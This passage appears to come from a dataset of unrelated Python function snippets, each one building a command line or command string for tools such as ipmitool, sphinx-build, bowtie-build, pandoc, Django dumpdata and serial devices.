'\"\n + str(csv_commands[j])\n + \"' is missing! Inserted 0 instead.\"\n )\n command += \"0\" + sepa\n\n command = command.strip(\" \").strip(\",\") # to get rid of last comma\n\n else: # So if no CSV was found for this command, just build the command with the value and the separator\n # First check if a List is present or so\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n string = \"\"\n for item in command_tuple[1]:\n command = syntax[1] + str(item) + \" \" + command_item\n command = command.strip()\n # Add a command terminator if one is needed and the last part of the syntax\n command += device_dict.get(\"execution_terminator\", \"\")\n return_list.append(command)\n return return_list\n\n else: # If only a command was passed\n string = str(command_tuple[1])\n command += syntax[1] + str(string).strip()\n\n if (\n only_command\n and device_dict.get(\"no_syntax_with_single_commmand\", False)\n and syntax[1] != \" \"\n and syntax[0] != \" \"\n ):\n command = command.replace(syntax[1], \"\")\n command = command.replace(syntax[0], \"\")\n\n # command += \" \" + str(device_dict[str(command_item)]).strip() + syntax[0] # adds the order to the command\n command += (\n \" \" + str(command_item).strip() + syntax[0]\n ) # adds the order to the command\n # Add a command terminator if one is needed and the last part of the syntax\n command = command.strip()\n command += device_dict.get(\"execution_terminator\", \"\")\n # command += syntax[0] # adds the order to the command\n return_list.append(command)\n\n # Command -> Value\n else:\n command += (\n str(command_item).strip() + \" \" + syntax[0]\n ) # adds the order to the command\n\n # Now look if a csv structure is necessary for the command to work\n start_ind = command_tuple[0].find(\n \"_\"\n ) # finds the index of the command, to search for\n if (\n \"CSV\" + command_tuple[0][start_ind:] in device_dict\n ): # looks if an actual csv-command is there\n # Todo: test CSV command\n csv_commands = device_dict[\n \"CSV\" + str(command_tuple[0])[start_ind:]\n ]\n csv_commands = (\n csv_commands.strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n ) # get rid of some caracters which should not be there\n csv_commands = csv_commands.split(\n \",\"\n ) # now split it for easy access\n\n # Make sure you always got a list of the next commandblock will fail\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n value_list = command_tuple[1]\n elif type(command_tuple[1]) == str or type(command_tuple) == type(\n u\"Unicode\"\n ):\n value_list = (\n command_tuple[1]\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n .replace(\" \", \"\")\n )\n value_list = value_list.split(\",\")\n\n csv_list = (\n \",\".join(map(str, value_list))\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n )\n csv_list = csv_list.split(\",\")\n\n for i, com in enumerate(csv_list):\n # here the input will be checked if enough parameters are passed for this command.\n # If not a 0 will be entered and a warning will be printed\n command += str(csv_list[i]).strip() + sepa + \" \"\n\n if i + 1 < len(csv_commands) and len(csv_commands) > 1:\n for j in range(\n i + 1, len(csv_commands)\n ): # Fill the rest of the missing paramters\n l.warning(\n \"Not enough parameters passed for function: \"\n + str(command_tuple[0])\n + \" the command must consist of \"\n + str(csv_commands)\n + \" '\"\n + str(csv_commands[j])\n + \"' is missing! Inserted 0 instead.\"\n )\n command += \" \" + \"0\" + sepa\n\n command = command.strip(\" \").strip(\n \",\"\n ) # to get rid of last comma and space at the end if csv\n command += syntax[1]\n\n else: # So if no CSV was found for this command, just build the command with the value and the separator\n # First check if a List is present or so\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n string = \"\"\n for item in command_tuple[1]:\n command = str(item) + \" \" + command_item + syntax[1]\n command = command.strip()\n # Add a command terminator if one is needed and the last part of the syntax\n command += device_dict.get(\"execution_terminator\", \"\")\n return_list.append(command)\n return return_list\n\n else: # If its just one value or no value\n string = str(command_tuple[1])\n command += string.strip() + syntax[1]\n command = command.strip()\n\n if (\n only_command\n and device_dict.get(\"no_syntax_with_single_commmand\", False)\n and syntax[1] != \" \"\n and syntax[0] != \" \"\n ):\n command = command.replace(syntax[1], \"\")\n command = command.replace(syntax[0], \"\")\n\n # Add a command terminator if one is needed and the last part of the syntax\n command += device_dict.get(\"execution_terminator\", \"\")\n return_list.append(command.strip())\n else:\n # If the command is not found in the device only command tuple will be send\n l.error(\n \"Command \"\n + str(command_tuple[0])\n + \" was not found in device! Unpredictable behavior may happen. No commad build!\"\n )\n return \"\"\n\n # Add a command terminator if one is needed and the last part of the syntax\n # command += device_dict.get(\"execution_terminator\",\"\")\n\n # Todo: multiple commands return\n if len(return_list) > 1:\n return return_list\n else:\n return str(return_list[0])", "def cmd(self, cmd):\n return cmd", "def post_command(self) -> str:\n rtn = ''\n if self.terminator:\n rtn += self.terminator\n\n if self.suffix:\n rtn += ' ' + self.suffix\n\n if self.pipe_to:\n rtn += ' | ' + self.pipe_to\n\n if self.output:\n rtn += ' ' + self.output\n if self.output_to:\n rtn += ' ' + self.output_to\n\n return rtn", "def get_command(self, kword: str):\n # Step Zero is to make sure that the name does not belong to a REAL command.\n zero, mod = super().get_command(kword)\n if zero:\n return zero, mod\n\n # Otherwise, first, ensure that the keyword does in fact exist in the custom list.\n command = self.config.commands.get(kword, None)\n if not command:\n return None, None\n response = command[\"com\"]\n\n # Build the function to return the response. Note that \"self\" exists already.\n async def cmd_custom(args, src, **_):\n if args:\n member = self.get_member(src, args[0].strip())\n tag = member.mention if member else None\n else:\n tag = None\n\n nsfw = command.get(\"nsfw\", False)\n if nsfw and src.channel.id not in self.config.get(\"nsfwChannels\"):\n return None\n\n # Replace tags where needed.\n try:\n output = response.format(\n self=src.author.name,\n myID=src.author.id,\n tag=tag or src.author.mention,\n )\n except KeyError:\n return None\n else:\n return output\n\n # Specify the docstring and name so that !help will work on this.\n short = response.replace(\"{\", \"{{\").replace(\"}\", \"}}\")\n if len(short) > 80:\n short = short[:77] + \"...\"\n cmd_custom.__doc__ = (\n \"__Custom command__: Return the following text: ```{}```\\n\\n\".format(short)\n + command.get(\n \"desc\",\n \"This is a custom command, so available help text is limited, but at the same time, the command is very simple. All it does is return a string, although the string may include formatting tags for invoker name, invoker ID, and a targeted mention.\",\n )\n + \"\\n\\nSyntax: `{p}\"\n + kword.lower()\n + (\" <user_ID>\" if \"{tag}\" in response else \"\")\n + \"`\"\n )\n cmd_custom.__name__ = \"cmd_\" + kword.lower()\n\n return cmd_custom, None", "def build_command_line( self, job ):\n commands = job.get_command_line()\n # All job runners currently handle this case which should never\n # occur\n if not commands:\n return None\n return commands", "def build():", "def label(cmd):\n cmd = cmd.replace('make][.DP', 'make1][.NP')\n cmd = cmd.replace('make][.SC', 'make2][.SC')\n cmd = re.sub('(draw.*)one','\\\\1one1',cmd)\n cmd = re.sub('(make1.*)one','\\\\1one1',cmd)\n cmd = re.sub('(make2.*)one','\\\\1one2',cmd)\n cmd = re.sub('(move.*)one','\\\\1one2',cmd)\n cmd = re.sub('(hide.*)one','\\\\1one2',cmd)\n cmd = '[result ' + cmd + ']' #dummy function for plop\n return cmd", "def build_commands(self):\r\n for tag in self.bmark.tags.keys():\r\n # if this tag is a command then return true\r\n if tag in COMMANDLIST:\r\n self.commands.append(tag)", "def __init__(self, cmd):\n # Build command + options \n self.cmd = cmd \n setattr(self, 'command', \"%s\" % (cmd))", "def bowtie_build_cmd(fasta,ebwt_basename):\n build_index_cmd = Command(\"bowtie-build\",\n \"-f\",fasta,\n ebwt_basename)\n return build_index_cmd", "def __getFullCommandName(self, command, type):\n return 'cmd_%s_%s' % (type, command)", "def _build_setup_command(self, cmd, unit):\n # use defaults - in the future, may consider making some of these parameters\n # byte 0\n channel_address = unit\n # byte 1\n line_feed = self._param_dict.format(Parameter.LINEFEED)\n parity_type = self._param_dict.format(Parameter.PARITY_TYPE)\n parity_enable = self._param_dict.format(Parameter.PARITY_ENABLE)\n extended_addressing = self._param_dict.format(Parameter.EXTENDED_ADDRESSING)\n baud_rate = self._param_dict.format(Parameter.BAUD_RATE)\n baud_rate = getattr(BaudRate, 'BAUD_%d' % baud_rate, BaudRate.BAUD_9600)\n # byte 2\n alarm_enable = self._param_dict.format(Parameter.ALARM_ENABLE)\n low_alarm_latch = self._param_dict.format(Parameter.LOW_ALARM_LATCH)\n high_alarm_latch = self._param_dict.format(Parameter.HIGH_ALARM_LATCH)\n rtd_wire = self._param_dict.format(Parameter.RTD_4_WIRE)\n temp_units = self._param_dict.format(Parameter.TEMP_UNITS)\n echo = self._param_dict.format(Parameter.ECHO)\n delay_units = self._param_dict.format(Parameter.COMMUNICATION_DELAY)\n # byte 3\n precision = self._param_dict.format(Parameter.PRECISION)\n precision = getattr(UnitPrecision, 'DIGITS_%d' % precision, UnitPrecision.DIGITS_6)\n large_signal_filter_constant = self._param_dict.format(Parameter.LARGE_SIGNAL_FILTER_C)\n large_signal_filter_constant = filter_enum(large_signal_filter_constant)\n small_signal_filter_constant = self._param_dict.format(Parameter.SMALL_SIGNAL_FILTER_C)\n small_signal_filter_constant = filter_enum(small_signal_filter_constant)\n\n # # Factory default: 0x31070182\n # # Lab default: 0x310214C2\n\n byte_0 = int(channel_address.encode(\"hex\"), 16)\n log.debug('byte 0: %s', byte_0)\n byte_1 = \\\n (line_feed << 7) + \\\n (parity_type << 6) + \\\n (parity_enable << 5) + \\\n (extended_addressing << 4) + \\\n baud_rate\n log.debug('byte 1: %s', byte_1)\n byte_2 = \\\n (alarm_enable << 7) + \\\n (low_alarm_latch << 6) + \\\n (high_alarm_latch << 5) + \\\n (rtd_wire << 4) + \\\n (temp_units << 3) + \\\n (echo << 2) + \\\n delay_units\n log.debug('byte 2: %s', byte_2)\n byte_3 = \\\n (precision << 6) + \\\n (large_signal_filter_constant << 3) + \\\n small_signal_filter_constant\n log.debug('byte 3: %s', byte_3)\n\n setup_command = '#%sSU%02x%02x%02x%02x' % (unit[0], byte_0, byte_1, byte_2, byte_3) + NEWLINE\n log.debug('default setup command (%r) for unit %02x (%s)' % (setup_command, byte_0, unit[0]))\n return setup_command", "def build_command(device, command_tuple, single_commands=False):\n if isinstance(command_tuple, (str)):\n command_tuple = (command_tuple, \"\") # make da dummy command\n\n if command_tuple[0] in device:\n\n if isinstance(device[command_tuple[0]], dict):\n try:\n com = device[command_tuple[0]][\"command\"]\n except:\n l.error(\n \"Dict command structure recognised but no actual command found for passed order {}\".format(\n command_tuple\n ),\n exc_info=True,\n )\n return None\n else:\n com = device[command_tuple[0]]\n\n if isinstance(command_tuple[1], (str, float, int)):\n try:\n return com.format(command_tuple[1])\n except IndexError:\n l.error(\n \"You attempted to send a command with the wrong number of parameters the command structure is: {}\"\n \" but you passed: [{}] as parameter(s)\".format(\n com, command_tuple[1]\n ),\n exc_info=True,\n )\n\n elif single_commands:\n if isinstance(command_tuple[1], list) or isinstance(\n command_tuple[1], tuple\n ):\n return [com.format(single) for single in command_tuple[1]]\n else:\n l.error(\"In order to build a list command, a list has to be passed!\")\n return None\n\n elif isinstance(command_tuple[1], list) or isinstance(command_tuple[1], tuple):\n # Find occurance of {} in string if list is as long as occurance of {} then just pass otherwise join a string\n brackets_count = device[command_tuple[0]].count(\"{}\")\n if len(command_tuple[1]) == brackets_count:\n return com.format(*command_tuple[1])\n elif brackets_count == 1 and len(command_tuple[1]) > brackets_count:\n sep = device.get(\"separator\", \" \")\n return com.format(sep.join([str(x) for x in command_tuple[1]]))\n elif (\n len(command_tuple[1]) > brackets_count\n or len(command_tuple[1]) < brackets_count\n and brackets_count != 1\n ):\n l.error(\n \"Could not build command for input length {}\"\n \" and input parameters length {}. Input parameters must be of same length\"\n \" as defined in config or 1\".format(\n len(command_tuple[1]), brackets_count\n )\n )\n return None\n else:\n l.error(\n \"Could not find command {} in command list of device: {}\".format(\n command_tuple[0], device[\"Device_name\"]\n )\n )", "def MakeCommand(base_cmd, outpath, filename):\n basename = os.path.basename(filename)\n out = os.path.join(outpath, os.path.splitext(basename)[0] + '.obj')\n return (base_cmd + ['-c', filename, '-o', out], basename)", "def _gen_cmd(cmd, address):\n family = {4: 'inet', 6: 'inet6'}[address[0].version]\n args = ['addr', cmd, '%s/%s' % (address[0], address[1])]\n if family == 'inet' and cmd == 'add':\n args += ['brd', '+']\n args += ['dev', real_ifname]\n if family == 'inet6':\n args = ['-6'] + args\n return args", "def build(c):", "def __generate_usage_string(self):\n usage = \"{} <command> [<args>]\\n\\n\" \\\n \"Available commands:\\n\".format(self.name)\n max_name_length = len(max(self.cmd_list, key=lambda x: len(x[0]))[0])\n for name, desc in self.cmd_list:\n name_spacing = \" \" * (max_name_length - len(name)) + \" \" * 5\n usage += \" {}{}{}\\n\".format(name, name_spacing, desc)\n\n return usage", "def create_cmd(self, out_log, err_log):\n instructions_list = []\n\n # executable path\n instructions_list.append(self.reduce_path)\n\n if self.flip: instructions_list.append('-FLIP')\n if self.noflip: instructions_list.append('-NOFLIP')\n if self.nuclear: instructions_list.append('-NUClear')\n if self.nooh: instructions_list.append('-NOOH')\n if self.oh: instructions_list.append('-OH')\n if self.his: instructions_list.append('-HIS')\n if self.noheth: instructions_list.append('-NOHETh')\n if self.rotnh3: instructions_list.append('-ROTNH3')\n if self.norotnh3: instructions_list.append('-NOROTNH3')\n if self.rotexist: instructions_list.append('-ROTEXist')\n if self.rotexoh: instructions_list.append('-ROTEXOH')\n if self.allalt: instructions_list.append('-ALLALT')\n if self.onlya: instructions_list.append('-ONLYA')\n if self.charges: instructions_list.append('-CHARGEs')\n if self.dorotmet: instructions_list.append('-DOROTMET')\n if self.noadjust: instructions_list.append('-NOADJust')\n if self.build: instructions_list.append('-BUILD')\n\n instructions_list.append(self.input_path)\n instructions_list.append('>')\n instructions_list.append(self.output_path)\n\n return instructions_list", "def create_command(command: str, *parameters) -> str:\n if parameters and isinstance(parameters, tuple) and isinstance(parameters[0], tuple):\n parameters = parameters[0]\n str_param: str = ' '.join([str(param) for param in parameters]) if parameters else \"\"\n result = command+' ' + str_param + '\\r\\n' if str_param else command + '\\r\\n'\n return result", "def create_cmd(dotfile, pngfile):\n dot = DOT\n DOT_CMD_INDX = 0\n DOT_FILE_INDX = 2\n PNGF_FILE_INDX = 4\n cmd = CMD_LIST[:]\n cmd[DOT_CMD_INDX] = dot\n cmd[DOT_FILE_INDX] = f\"{dotfile}\"\n cmd[PNGF_FILE_INDX] = f\"{pngfile}\"\n return cmd", "def makeLabel(self, cmd):\n if cmd.type in ['Function', 'Call']:\n return cmd.arg1\n\n if self.current_function_name is not None:\n prefix = self.current_function_name\n else:\n prefix = self.ns\n return prefix + '$' + cmd.arg1", "def _generate_add_user_command(self):\n args = self._add_user()\n #Create command string\n command = \"add_user {0} {1} {2}\".format(args[\"userID\"], args[\"name\"], args[\"webhook_url\"])\n if args[\"override\"]:\n command += \" override {0} {1} {2}\".format(args[\"overrideUserID\"], args[\"overrideUser\"], args[\"overrideOauth\"])\n if args[\"blacklist\"] != \"\":\n command += \" {0}\".format(args[\"blacklist\"])\n command += \"\\r\\n\"\n return(command)", "def test_cmd_builder(self):\n test_conf = '/tmp/test'\n expected_cmd = ['calabar_vpnc', test_conf]\n\n cmd = self.t._build_cmd(test_conf, None)\n self.assertTrue(cmd, expected_cmd)", "def build_command(self, args):\n self._validate_common(args)\n self._set_manifests(args)\n\n manifest = self._manager._recipes\n\n records = self._get_matching_records(args, manifest)\n\n if not len(records):\n sys.exit(\"No matching items found.\")\n\n for record in records:\n result = self._manager.build(record['_type'], **record)\n print('The requested asset has been built: {}'.format(result['_path']))\n\n if len(records) > 1:\n print('All files have been successfully built. Thank you.')", "def shell_command(self):\n # TODO: fix this naive version by adding quotes where appropriate\n return \" \".join(self.args)", "def command(self) -> str:\n cmd = ''\n if self.argv:\n cmd = self.argv[0]\n return cmd", "def makeCommands(f0,psi0,th,logFileName,mat,fnyld,fnhrd):\n from mk.library.lib import gen_tempfile\n stdoutFileName = gen_tempfile(\n prefix='stdout-mkrun')\n # stdoutFileName ='/tmp/dump'\n\n cmd = 'python main.py --fn %s -f %5.4f -p %+6.1f -t %+7.2f --fnyld %s --fnhrd %s '%(\n logFileName,f0,psi0,th,fnyld,fnhrd)\n\n if mat!=-1:\n cmd = cmd + ' --mat %i'%mat\n cmd = cmd + ' > %s'%stdoutFileName\n print 'cmd:',cmd\n return cmd", "def genCMakeCmd(self):\n \n cmd = \"cmake -C \" + self.parent.env[\"ILCSOFT_CMAKE\"] + \" \"\n for k, v in self.envcmake.iteritems():\n cmd = cmd + \"-D\" + k + \"=\\\"\" + str(v).strip() + \"\\\" \"\n\n cmd += self.installPath\n\n return cmd.strip()", "def command_short():\n pass", "def build_command(args, parser):\n cmd = \"ipmitool -I lanplus\"\n if not args.host:\n print \"\\nERROR: hostname is required.\\n\"\n parser.print_help()\n sys.exit(1)\n else:\n cmd += ' -H ' + args.host\n if args.port:\n cmd += ' -p ' + args.port\n if not args.user:\n print \"\\nERROR: username is required.\\n\"\n parser.print_help()\n sys.exit(1)\n else:\n cmd += ' -U ' + args.user\n if args.passwd:\n cmd += ' -P ' + args.passwd\n cmd += ' dcmi power reading'\n if args.interval:\n global INTERVAL\n INTERVAL = args.interval\n if args.nread:\n global NREAD\n NREAD = args.nread\n else:\n global INFINITY\n INFINITY = True\n if args.store:\n global STORE\n STORE = True\n return cmd", "def __str__(self):\n if not self._args and not self.subcommand:\n return self.cmd\n elif not self._args and self.subcommand:\n return '{} {}'.format(\n self.cmd, self.subcommand)\n elif self._args and not self.subcommand:\n return '{} {}'.format(\n self.cmd, ' '.join(self._args))\n else:\n return '{} {} {}'.format(\n self.cmd, self.subcommand, ' '.join(self._args))", "def _build_robovac_command(mode, command):\n mcu_ota_header_0xa5 = 0xA5\n cmd_data = (mode.value + command.value)\n\n return bytes([mcu_ota_header_0xa5, mode.value, command.value, cmd_data, 0xFA])", "def _get_command_args_syntax_help_string(command, is_no_command, args):\n syntax_string = ''\n if args:\n for i, arg in enumerate(args):\n if i > 0:\n syntax_string += ' '\n \n if _is_string(arg):\n syntax_string += arg\n continue\n\n if type(arg) == tuple:\n if debug.description():\n print _line(), command['self'], arg\n\n if is_no_command:\n optional = arg.get('optional-for-no', False)\n else:\n optional = arg.get('optional', False)\n if optional:\n syntax_string += '['\n \n choices = arg.get('choices')\n nested_args = arg.get('args')\n if nested_args:\n if choices:\n raise error.CommandDescriptionError('An argument can\\'t have both '\n '\"choices\" and \"args\" attributes', command)\n choices = (nested_args,)\n if choices:\n # Suppress choice delimiters if we've already emitted the square\n # brackets to indicate an optional argument. This is so we get\n # something simpler (e.g. \"[this | that]\" ) instead of getting\n # doubled delimiters (e.g. \"[{this | that}]\").\n if not optional:\n syntax_string += '{'\n \n for j, choice in enumerate(choices):\n if j > 0:\n syntax_string += ' | '\n choice_args = _get_choice_args(choice)\n choice_syntax_string = _get_command_args_syntax_help_string(command,\n is_no_command,\n choice_args)\n syntax_string += choice_syntax_string\n \n if not optional:\n syntax_string += '}'\n else:\n field = arg.get('field')\n \n tag = arg.get('tag')\n if tag:\n syntax_string += tag + ' '\n \n token = arg.get('token')\n if token:\n syntax_string += token\n\n if (field != None) and (arg.get('type') != 'boolean'):\n help_name = arg.get('help-name')\n if help_name:\n help_name = '<' + help_name + '>'\n else:\n if arg.get('type') == 'enum':\n values = arg.get('values')\n if values:\n if _is_string(values):\n values = (values,)\n help_name = ' | '.join(values)\n if len(values) > 1:\n help_name = '{' + help_name + '}'\n if not help_name:\n help_name = '<' + field + '>'\n syntax_string += help_name\n if optional:\n syntax_string += ']'\n \n return syntax_string", "def get_commands():\n return \"Commands:\\n 1 [Find shortest path between given cities]\\n 2 [Find shortest path between random cities]\\n 3 [See list of cities]\\n 4 [Close application]\\n\"", "def _arg_to_command(k: str, v: Optional[Union[str, int, float]] = None):\n command = _arg_to_flag(k)\n if v is not None:\n command += f' {v}'\n return command", "def __str__(self):\n self._validate()\n commandline = \"%s \" % self.program_name\n for parameter in self.parameters:\n if parameter.is_set:\n #This will include a trailing space:\n commandline += str(parameter)\n return commandline.strip() # remove trailing space", "def make_command(remit=str(),\n source=str(),\n writer=str(),\n extension=str(),\n pandoc_options=list()):\n # if no extension specified, infer it from writer\n if not extension and writer:\n if writer in spec.DEFAULT_EXTENSION:\n extension = spec.DEFAULT_EXTENSION[writer]\n else:\n print('WARNING: No known extension for writer \"%s\", '\n 'using \".UNKNOWN\"' % writer)\n extension = '.UNKNOWN'\n # start building the command...\n # remit\n command = [remit]\n # input file\n # - if remit_WRITER.md exists, then use it!\n writer_specific_source = remit + '_' + writer + '.md'\n if os.path.exists(writer_specific_source):\n command += [writer_specific_source]\n else:\n command += [remit + '.md']\n # writer\n if writer:\n command += ['-t']\n command += [writer]\n # other options\n command.extend(pandoc_options)\n # output\n # - first build output filename...\n if writer == '':\n pretty_writer_string = 'default'\n else:\n pretty_writer_string = writer\n target = os.path.join(os.getcwd(), '..', '..', 'output-'+remit,\n source,\n pretty_writer_string\n + ''.join(pandoc_options)\n + extension)\n target = os.path.normpath(target)\n target = os.path.relpath(target)\n command += ['-o']\n command += [target]\n # panzer-specific options\n if remit == 'panzer':\n command += ['---quiet']\n # support directory\n command += ['---panzer-support']\n target = os.path.join(os.getcwd(), '..', '..', 'dot-panzer')\n target = os.path.normpath(target)\n target = os.path.relpath(target)\n command += [target]\n # debug outputs\n # command += ['---debug']\n # target = os.path.join(os.getcwd(), '..', '..', 'output-'+remit,\n # source, 'debug', 'debug_' + source)\n # target = os.path.normpath(target)\n # command += [target\n # + \"_\"\n # + pretty_writer_string\n # + ''.join(pandoc_options)]\n # done!\n return command", "def _make_cmdline(self, line):\n if isinstance(line, list):\n parts = line\n else:\n parts = line.split(\" \", 1)\n cmd = parts[0]\n exe = os.path.join(BINDIR, cmd)\n\n python_cmds = [\"samba-tool\",\n \"samba_dnsupdate\",\n \"samba_upgradedns\",\n \"script/traffic_replay\",\n \"script/traffic_learner\"]\n\n if os.path.exists(exe):\n parts[0] = exe\n if cmd in python_cmds and os.getenv(\"PYTHON\", None):\n parts.insert(0, os.environ[\"PYTHON\"])\n\n if not isinstance(line, list):\n line = \" \".join(parts)\n\n return line", "def at_cmdset_creation(self):\n self.add(power.CmdPower())\n self.add(CmdCursedBone())\n # self.add(CmdDeathSpike())\n \"\"\"\n self.add(CmdAnchor())\n self.add(CmdBloodCloak())\n self.add(CmdBloodShield())\n self.add(CmdBloodWard())\n self.add(CmdBodyToMind())\n self.add(CmdBoneScythe())\n self.add(CmdCircleDeath())\n self.add(CmdCorpseBurst())\n self.add(CmdCorpseDrain())\n self.add(CmdCreateBloodGem())\n self.add(CmdCurseDeathLink())\n self.add(CmdDeathRain())\n self.add(CmdDeathWard())\n self.add(CmdDisease())\n self.add(CmdBoneDust())\n self.add(CmdGloom())\n self.add(CmdImbueBlood())\n self.add(CmdImbueDeath())\n self.add(CmdMassSilence())\n self.add(CmdMassSleep())\n self.add(CmdMassAnchor())\n self.add(CmdMassWeakness())\n self.add(CmdPlague())\n self.add(CmdPoison())\n self.add(CmdPoisonCloud())\n self.add(CmdSilence())\n self.add(CmdSleep())\n self.add(CmdSpectralHunter())\n self.add(CmdSummon())\n self.add(CmdSummonCorruptedMan())\n self.add(CmdSummonCursedArmy())\n self.add(CmdSummonCursedMan())\n self.add(CmdSummonReanimatedMan())\n self.add(CmdTeleport())\n self.add(CmdTeleportOther())\n self.add(CmdTransferPain())\n self.add(CmdVampiricClaw())\n self.add(CmdVampiricTouch())\n self.add(CmdWeakness())\n \"\"\"", "def test_commandRepr(self):\n repr(imap4.Command(b\"COMMAND\", [b\"arg\"], (b'extra')))", "def get_command(self) -> str:\n return 'title'", "def RUN_CMD(self) -> str:\n args = \" \\ \\n \".join(CONFIG.WEBPACK.ARGS)\n return f\"{CONFIG.WEBPACK.BIN} \\ \\n {args}\"", "def make_help_cmd(cmd, docstring):\n def help_cmd(message=docstring, cmd=cmd):\n print('=' * 15)\n print('\\nHelp for command %s:\\n' % (cmd,))\n print(message.strip())\n print('')\n print('=' * 15)\n print('')\n\n return help_cmd", "def build_command_line_parameters(params, command_name=\"-param\"):\n if params is None:\n return \"\"\n res = []\n for k, v in sorted(params.items()):\n if '\"' in v:\n v = v.replace('\"', '\\\\\"')\n one = '{2} {0}=\"{1}\"'.format(k, v, command_name)\n res.append(one)\n return \" \".join(res)", "def _sphinx_build(self, kind: str):\n if kind not in (\"html\", \"latex\"):\n raise ValueError(f\"kind must be html or latex, not {kind}\")\n\n cmd = [\"sphinx-build\", \"-b\", kind]\n if self.num_jobs:\n cmd += [\"-j\", self.num_jobs]\n if self.warnings_are_errors:\n cmd += [\"-W\", \"--keep-going\"]\n if self.verbosity:\n cmd.append(f\"-{'v' * self.verbosity}\")\n cmd += [\n \"-d\",\n os.path.join(BUILD_PATH, \"doctrees\"),\n SOURCE_PATH,\n os.path.join(BUILD_PATH, kind),\n ]\n return subprocess.call(cmd)", "def _sphinx_build(self, kind: str):\n if kind not in (\"html\", \"latex\"):\n raise ValueError(f\"kind must be html or latex, not {kind}\")\n\n cmd = [\"sphinx-build\", \"-b\", kind]\n if self.num_jobs:\n cmd += [\"-j\", self.num_jobs]\n if self.warnings_are_errors:\n cmd += [\"-W\", \"--keep-going\"]\n if self.verbosity:\n cmd.append(f\"-{'v' * self.verbosity}\")\n cmd += [\n \"-d\",\n os.path.join(BUILD_PATH, \"doctrees\"),\n SOURCE_PATH,\n os.path.join(BUILD_PATH, kind),\n ]\n return subprocess.call(cmd)", "def get_commands(bot):\n new_commands = []\n\n new_commands.append(Command(\n 'mycommand', subcommands=[\n SubCommand(\n Opt('myoption'),\n doc='This is a simple command with a single required option.'),\n SubCommand(\n Opt('custom', optional=True),\n Opt('attached', optional=True, attached='attached argument'),\n doc='This has two different optional options, one without an attached '\n 'parameter, and the other requiring an attached parameter.'),\n SubCommand(\n Opt('trailing'),\n Arg('arg 1'),\n Arg('arg 2'),\n Arg('arg 3', argtype=ArgTypes.SPLIT, additional='more args'),\n doc='This command requires a lot of trailing arguments.'),\n SubCommand(\n Opt('grouped'),\n Arg('grouped arguments', argtype=ArgTypes.MERGED),\n doc='This will group all given arguments as a single string.'),\n SubCommand(\n Opt('complex', attached='attached'),\n Opt('other', optional=True, attached='also required'),\n Arg('arg 1'),\n Arg('arg 2', argtype=ArgTypes.SPLIT_OPTIONAL, additional='more args'),\n doc='The complex option has a required attached parameter, and the '\n '\\'other\\' option also has a required attached parameter if '\n '\\'other\\' is included. Additionally, there will be a requirement '\n 'of at least 1 trailing argument.'),\n SubCommand(\n Opt('marquee'),\n Arg('text', argtype=ArgTypes.MERGED,\n check=lambda b, m, v, *a: len(v) <= 100,\n check_error=\"Marquee message must be less than 100 characters long.\"),\n doc='Creates a marquee that loops 3 times.')],\n shortcuts=[\n Shortcut(\n 'complex', 'complex {attached} other {other} {arg 1} {arg 2}',\n Arg('attached'), Arg('other'), Arg('arg 1'),\n Arg('arg 2', argtype=ArgTypes.SPLIT_OPTIONAL)),\n Shortcut(\n 'marquee', 'marquee {text}', Arg('text', argtype=ArgTypes.MERGED))],\n description='Your command description here.',\n other='This text is optional - it just shows up after everything '\n 'else. Quick note, all of the commands here can only be used by '\n 'bot moderators or above, as indicated by elevated_level. A '\n 'level of 2 would mean only server owners or above can use the '\n 'command, and a level of 3 would restrict the command to only '\n 'the bot owners.',\n elevated_level=1, category='demo'))\n\n new_commands.append(Command(\n 'myothercommand', subcommands=[\n SubCommand(\n Arg('text', argtype=ArgTypes.MERGED_OPTIONAL),\n doc='This traps all further commands from being executed.'),\n SubCommand(\n Opt('order'), Opt('matters'),\n doc='It is impossible to access this command because the first '\n 'subcommand will always be satisfied first. Order of the '\n 'subcommand matters!'),\n SubCommand(\n Opt('sample'), Opt('foo'), Opt('bar'),\n doc='Also impossible to access. This subcommand just adds some '\n 'keywords to the command.')],\n description='Only bot owners can see this text!',\n other='Note that no shortcuts were defined. They, too, are optional. '\n 'Also, this command is hidden, which means that only the bot '\n 'owners can see this command listed from the help command. '\n 'However, unless the command is configured with an elevated '\n 'permissions level, any user can still execute the command. '\n 'Users still will not be able to see the specific help for this '\n 'command, though. Lastly, this command is disabled in DMs.',\n hidden=True, allow_direct=False, category='demo'))\n\n new_commands.append(Command(\n 'notify', subcommands=[\n SubCommand(\n Arg('text', argtype=ArgTypes.MERGED),\n doc='Notify the owners with some text!')],\n other='This command uses a custom function. It is called with the '\n 'same arguments as get_response. The command will show up to '\n 'all users in the help command, but can only be used by server '\n 'owners, as it is disallowed in direct messages.',\n elevated_level=2, allow_direct=False, function=custom_notify,\n category='demo'))\n\n new_commands.append(Command(\n 'wait', other='Use this command to demo the wait_for functionality', category='demo'))\n\n return new_commands", "def get_usage_command(self):\n return textwrap.fill(self.sbtools.parser.expand_prog_name(\"Type '%prog help %s' for usage.\") % (self.tool.get_command()), 78)", "def _generateBoolectorCommand(self, location):\n command = []\n\n command.append(config.SOLVER_BOOLECTOR)\n command.append(\"--model\")\n command.append(\"--smt2\")\n command.append(\"-\" + SatSolver.getName(self.satSolver))\n command.append(location)\n\n return command", "def _build_command(tables, fixtures_path, fixture_name):\n command = \"python manage.py dumpdata{0} --indent=4 > {1}/{2}\".format(\n tables, fixtures_path, fixture_name\n )\n return command", "def get_usage_command(self):\n return textwrap.fill(self.expand_prog_name(\"Type '%prog help' for usage information.\"), 78)", "def command(fxn):\n\tCMDTABLE[fxn.__name__] = (fxn, fxn.__doc__)\n\treturn fxn", "def _GetCommand(self):\n cmd = [FLAGS.openstack_cli_path]\n cmd.extend(self.args)\n for flag_name, values in six.iteritems(self.flags):\n flag_name_str = '--%s' % flag_name\n if values is True:\n cmd.append(flag_name_str)\n else:\n values_iterable = values if isinstance(values, list) else [values]\n for value in values_iterable:\n cmd.append(flag_name_str)\n cmd.append(str(value))\n cmd.extend(self.additional_flags)\n return cmd", "def __init__(self, command, target: str):\n self.command = command\n self.target = target", "def __str__(self):\n out = 